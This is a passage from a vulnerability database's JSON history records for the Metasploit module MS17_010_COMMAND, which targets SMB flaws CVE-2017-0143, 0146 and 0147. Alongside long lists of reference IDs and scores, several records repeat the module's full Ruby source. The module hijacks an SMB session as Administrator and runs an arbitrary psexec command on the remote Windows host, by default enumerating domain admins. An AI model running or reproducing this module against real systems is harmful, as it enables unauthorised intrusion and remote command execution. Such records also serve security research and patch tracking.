"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-07T20:36:20", "value": 7.2, "vector": "NONE"}}, "hash": "032f89b8b6efb729d4cc700fbcf6660e", "history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "lastseen": "2020-03-07T20:36:20", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T01:05:44", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptString.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 266}, "differentElements": ["published", "modified"], "edition": 138, "lastseen": "2020-03-07T20:36:20"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-07-01T18:01:27", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-07-01T18:01:27", "rev": 2, "value": 7.2, "vector": "NONE"}}, "hash": "95ab11c1ba313720bd278e95f96a3e6f", "history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "lastseen": "2020-07-01T18:01:27", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptPort.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 364}, "differentElements": ["published", "modified"], "edition": 185, "lastseen": "2020-07-01T18:01:27"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2019-08-14T05:45:32", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"modified": "2019-08-14T05:45:32", "value": 7.2, "vector": "NONE"}}, "hash": "032f89b8b6efb729d4cc700fbcf6660e", "history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "lastseen": "2019-08-14T05:45:32", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T01:05:44", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptString.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 246}, "differentElements": ["cvss", "references", "description", "cvelist", "published", "modified", "sourceHref", "sourceData", "title"], "edition": 90, "lastseen": "2019-08-14T05:45:32"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the 